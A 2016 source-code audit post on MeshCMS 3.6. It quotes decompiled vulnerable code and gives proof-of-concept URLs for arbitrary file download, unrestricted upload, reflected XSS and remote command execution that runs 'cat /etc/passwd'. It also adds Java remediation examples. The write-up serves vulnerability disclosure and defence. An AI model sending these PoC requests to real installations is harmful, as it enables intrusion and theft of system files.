[Original] Source code audit of an open-source J2EE CMS: MeshCMS in practice
Posted on: 2016-6-8 18:11
Source code audit of an open-source J2EE CMS: learning and practice with MeshCMS
#############
Affected version: MeshCMS 3.6 (multiple vulnerabilities)
Date: 2016-04-03
Vendor: http://www.cromoteca.com/en/meshcms/
Download: http://www.cromoteca.com/en/meshcms/download/
Version: 3.6
Test platform: Windows OS
#############
About MeshCMS:
MeshCMS is an online editing system written in Java. It provides a set of features usually included in a CMS, but it uses a more traditional approach: pages are stored in regular HTML files and all additional features are file-based, without needing a database.
#############
Vulnerability Description:
1. Directory traversal vulnerability (arbitrary file download)
The download feature is implemented by the servlet org.meshcms.core.DownloadServlet. It resolves the request path to a file inside the web application and streams it back without restricting the extension, so JSP source files can be downloaded. The optional filename parameter is also copied into the Content-Disposition header without escaping, as the decompiled excerpt shows.
// Decompiled excerpt of DownloadServlet: localObject is the File resolved from the request path.
String str = paramHttpServletRequest.getParameter("filename");
if (Utils.isNullOrEmpty(str)) {
    str = localPath.getLastElement();
}
try
{
    // No check on the extension or location of the file about to be streamed.
    FileInputStream localFileInputStream = new FileInputStream((File)localObject);
    paramHttpServletResponse.setContentType("application/x-download");
    // The client-supplied filename is written into the header unescaped.
    paramHttpServletResponse.setHeader("Content-Disposition", "attachment; filename=\"" + str + "\"");
    paramHttpServletResponse.setHeader("Content-Length", Long.toString(((File)localObject).length()));
    Utils.copyStream(localFileInputStream, paramHttpServletResponse.getOutputStream(), false);
}
// catch/finally of the decompiled method omitted from the excerpt
POC:
http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/filemanager/upload1.jsp
http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/login.jsp
2. File upload vulnerability
upload2.jsp does not validate the uploaded file at all (no filtering whatsoever). Both the target directory (the dir field) and the file name come from the multipart request; when fixname is not set the client-supplied name is used verbatim, and in neither case is the extension checked, so nothing stops a .jsp from being written into a directory the container serves.
// upload2.jsp excerpt (Commons FileUpload): dir, fixname and upfile all come from the client.
try {
    FileItem upItem = null;
    ServletFileUpload upload = new ServletFileUpload(new DiskFileItemFactory());
    upload.setProgressListener(new UploadProgressListener(request.getSession(true)));
    List items = upload.parseRequest(request);
    Iterator iter = items.iterator();
    while (iter.hasNext()) {
        FileItem item = (FileItem) iter.next();
        if (item.getFieldName().equals("dir")) {
            path = new Path(item.getString());          // target directory chosen by the client
        } else if (item.getFieldName().equals("fixname")) {
            fixName = Utils.isTrue(item.getString());   // name normalisation is optional
        } else if (item.getFieldName().equals("upfile") && item.getSize() > 0L) {
            upItem = item;
        }
    }
    if (upItem != null && path != null) {
        String fileName = new Path(upItem.getName()).getLastElement();
        if (fixName) {
            fileName = Utils.generateUniqueName
                (WebUtils.fixFileName(fileName, true), webSite.getFile(path));
        }
        // No extension or content check before the file is written.
        ok = webSite.saveToFile(userInfo, upItem, path.add(fileName));
    }
// catch block and result page of the JSP omitted from the excerpt
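The following is an added example, not MeshCMS code, showing the checks that both DownloadServlet (item 1) and upload2.jsp (item 2) lack: canonical-path confinement under the site root, a denylist of source and deployment files for downloads, an extension allowlist for uploads, and a Content-Disposition value the client cannot break out of. The class name SafeFiles, its method names, the extension lists and the demo directory layout are all assumptions made for the example.

```java
import java.io.File;
import java.io.IOException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;
import java.util.regex.Pattern;

/**
 * Added example (not MeshCMS code): the checks DownloadServlet and upload2.jsp
 * lack. SafeFiles and its method names are hypothetical.
 */
public final class SafeFiles {

    // Never stream these back as downloads: JSP source, compiled code, deployment/config files.
    private static final Set<String> NEVER_DOWNLOAD = new HashSet<>(Arrays.asList(
            "jsp", "jspx", "jspf", "class", "jar", "xml", "properties"));

    // Uploads are allowlisted by extension; anything else is refused.
    private static final Set<String> UPLOAD_OK = new HashSet<>(Arrays.asList(
            "jpg", "jpeg", "png", "gif", "pdf", "txt", "zip"));

    // One path element only: no separators, no NUL, no ';' tricks, bounded length.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9][A-Za-z0-9._-]{0,127}");

    /** Lower-cased extension, or "" when there is none. */
    public static String extension(String name) {
        int dot = name.lastIndexOf('.');
        return dot < 0 ? "" : name.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    /** Resolve userPath under baseDir; ".." and symlinks that leave baseDir are rejected. */
    public static File confine(File baseDir, String userPath) throws IOException {
        File base = baseDir.getCanonicalFile();
        File target = new File(base, userPath).getCanonicalFile();
        if (!target.getPath().startsWith(base.getPath() + File.separator)) {
            throw new IOException("path escapes site root: " + userPath);
        }
        return target;
    }

    /** Download rule: inside the root, not under WEB-INF/META-INF, a regular file, not source. */
    public static File resolveDownload(File siteRoot, String requestPath) throws IOException {
        File f = confine(siteRoot, requestPath);
        String rel = f.getPath().substring(siteRoot.getCanonicalPath().length() + 1);
        String first = rel.split(Pattern.quote(File.separator), 2)[0];
        if (first.equalsIgnoreCase("WEB-INF") || first.equalsIgnoreCase("META-INF")) {
            throw new IOException("refusing to serve " + rel);
        }
        if (!f.isFile() || NEVER_DOWNLOAD.contains(extension(f.getName()))) {
            throw new IOException("refusing to serve " + rel);
        }
        return f;
    }

    /** Upload rule: keep only the last path element of the client name, then allowlist the extension. */
    public static String safeUploadName(String clientName) {
        String name = clientName.replace('\\', '/');
        name = name.substring(name.lastIndexOf('/') + 1);
        if (!SAFE_NAME.matcher(name).matches() || !UPLOAD_OK.contains(extension(name))) {
            throw new IllegalArgumentException("rejected upload name: " + clientName);
        }
        return name;
    }

    /** Content-Disposition value in which quotes and CR/LF from the client cannot break the header. */
    public static String contentDisposition(String fileName) {
        return "attachment; filename=\"" + fileName.replaceAll("[\\r\\n\"\\\\]", "_") + "\"";
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout for the demo: one public file and one JSP under a throw-away root.
        File root = new File(System.getProperty("java.io.tmpdir"), "meshcms-audit-demo");
        new File(root, "admin").mkdirs();
        new File(root, "upload").mkdirs();
        new File(root, "upload/readme.txt").createNewFile();
        new File(root, "admin/login.jsp").createNewFile();

        System.out.println("served:  " + resolveDownload(root, "upload/readme.txt"));
        for (String p : new String[] {"admin/login.jsp", "../../etc/passwd", "WEB-INF/web.xml"}) {
            try {
                resolveDownload(root, p);
            } catch (IOException e) {
                System.out.println("blocked: " + e.getMessage());
            }
        }
        System.out.println("upload as: " + safeUploadName("C:\\Users\\x\\photo.png"));
        try {
            safeUploadName("shell.jsp");
        } catch (IllegalArgumentException e) {
            System.out.println("blocked: " + e.getMessage());
        }
        System.out.println(contentDisposition("a\"b\r\nX: y.txt"));
    }
}
```

The comparison in confine() is done on canonical paths, so "..", mixed separators and symlinks are all resolved before the prefix test; the "+ File.separator" keeps a sibling directory whose name merely starts with the root's name from passing. The upload check is an allowlist because a denylist of "jsp" misses jspx, jspf and container-specific extensions.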
3. Reflected XSS
The file meshcms/meshcms/admin/echo.jsp writes the fullsrc parameter straight back into the response body without any encoding. The Utils.encodeHTML helper that staticexport2.jsp applies to command output (see item 4) is exactly what is missing here.
// echo.jsp excerpt
try {
    response.resetBuffer();
} catch (IllegalStateException ex) {
    //
}
// fullsrc is echoed into the response with no HTML encoding
response.getWriter().write(request.getParameter("fullsrc"));
%>
POC:
http://127.0.0.1:8080/meshcms/meshcms/admin/echo.jsp?fullsrc=%3Cscript%3Ealert%281%29%3C/script%3E
4. Command execution vulnerability
During static export (the author describes it as the backup step), staticexport2.jsp executes a system command taken from the request: the exportCommand parameter is passed to Runtime.exec() without any validation or allowlist, giving remote command execution with the privileges of the servlet container.
// staticexport2.jsp excerpt: exportCommand is taken from the request parameters
if (!exportCommand.equals("")) {
    out.println("\nexecuting: " + exportCommand);
    // Runtime.exec() on a client-controlled string: remote command execution
    Process process = Runtime.getRuntime().exec(exportCommand);
    out.println("standard output:");
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    Utils.copyStream(process.getInputStream(), baos, false);
    // the output is HTML-encoded, which is why the result is shown to the attacker cleanly
    out.write(Utils.encodeHTML(baos.toString()));
    baos.reset();
    out.println("end of standard output\nerror output:");
    Utils.copyStream(process.getErrorStream(), baos, false);
    out.write(Utils.encodeHTML(baos.toString()));
    int exit = process.waitFor();
    out.println("end of error output\nexecution finished with exit code " + exit);
}
POC:
http://127.0.0.1:8080/meshcms/meshcms/admin/staticexport2.jsp?exportBaseURL=%2Fmeshcms%2Fadmin%2Fstaticexport1.jsp&exportDir=upload&exportCheckDates=true&exportCommand=cat+%2Fetc%2Fpasswd&exportSaveConfig=true
Runtime.exec(String) splits the string on whitespace and starts the program directly, without a shell, so a plain program plus arguments works as in the PoC, but shell metacharacters (pipes, redirects) are not interpreted unless a shell is named explicitly. The PoC passes a Unix command even though the test platform listed above is Windows; on a Windows target substitute an equivalent command.
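As an added example (not MeshCMS code), this is how the post-export hook can be kept without taking a command string from the request: the client may only name a profile, the argv for each profile lives in server-side configuration, and the process is started through ProcessBuilder without a shell, with no stdin, a drained output pipe and a bounded runtime. The class name SafeExportHook, the profile table, the timeout value and the demo call in main() are assumptions made for the example.

```java
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.concurrent.TimeUnit;

/**
 * Added example (not MeshCMS code): the request may only name a server-defined
 * profile; argv never comes from the client. Names and the table are hypothetical.
 */
public final class SafeExportHook {

    // Server-side table (in a real deployment read from site configuration, never from the request).
    private static final Map<String, List<String>> PROFILES;
    static {
        Map<String, List<String>> m = new HashMap<>();
        m.put("none", Collections.<String>emptyList());
        m.put("tar", Arrays.asList("tar", "-czf", "site.tar.gz", "."));
        PROFILES = Collections.unmodifiableMap(m);
    }

    private static final long TIMEOUT_SECONDS = 60;

    /** Map a client-chosen profile name to argv; unknown names are refused before anything runs. */
    public static List<String> argvFor(String profile) {
        List<String> argv = PROFILES.get(profile);
        if (argv == null) {
            throw new IllegalArgumentException("unknown export profile: " + profile);
        }
        return argv;
    }

    /** Run the profile's argv in exportDir without a shell, with bounded runtime and captured output. */
    public static String run(String profile, File exportDir) throws IOException, InterruptedException {
        List<String> argv = argvFor(profile);
        if (argv.isEmpty()) {
            return "no post-export command configured";
        }
        Process p = new ProcessBuilder(argv)
                .directory(exportDir)
                .redirectErrorStream(true) // one pipe to drain, so the child cannot stall on a full stderr
                .start();
        p.getOutputStream().close(); // the child gets no stdin

        final ByteArrayOutputStream out = new ByteArrayOutputStream();
        Thread drain = new Thread(() -> {
            try (InputStream in = p.getInputStream()) {
                byte[] buf = new byte[8192];
                int n;
                while ((n = in.read(buf)) != -1) {
                    out.write(buf, 0, n);
                }
            } catch (IOException ignored) {
                // pipe closed by destroyForcibly(): nothing more to read
            }
        });
        drain.start();
        boolean finished = p.waitFor(TIMEOUT_SECONDS, TimeUnit.SECONDS);
        if (!finished) {
            p.destroyForcibly();
        }
        drain.join();
        if (!finished) {
            throw new IOException("export command timed out: " + argv.get(0));
        }
        return "exit code " + p.exitValue() + "\n" + new String(out.toByteArray(), StandardCharsets.UTF_8);
    }

    /** Encode captured output before it goes into the status page (same role as Utils.encodeHTML). */
    public static String encodeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<': sb.append("&lt;"); break;
                case '>': sb.append("&gt;"); break;
                case '&': sb.append("&amp;"); break;
                case '"': sb.append("&quot;"); break;
                default: sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {
        // The PoC's exportCommand value is not a profile name, so it is rejected without being executed.
        try {
            argvFor("cat /etc/passwd");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println(encodeHtml(run("none", new File(System.getProperty("java.io.tmpdir")))));
    }
}
```

The point of the profile table is that nothing in the request can reach Runtime.exec() or ProcessBuilder as program text; if the site really needs a configurable command, it belongs in a configuration file that only the server administrator can edit, not in a parameter that any caller of staticexport2.jsp can set and save.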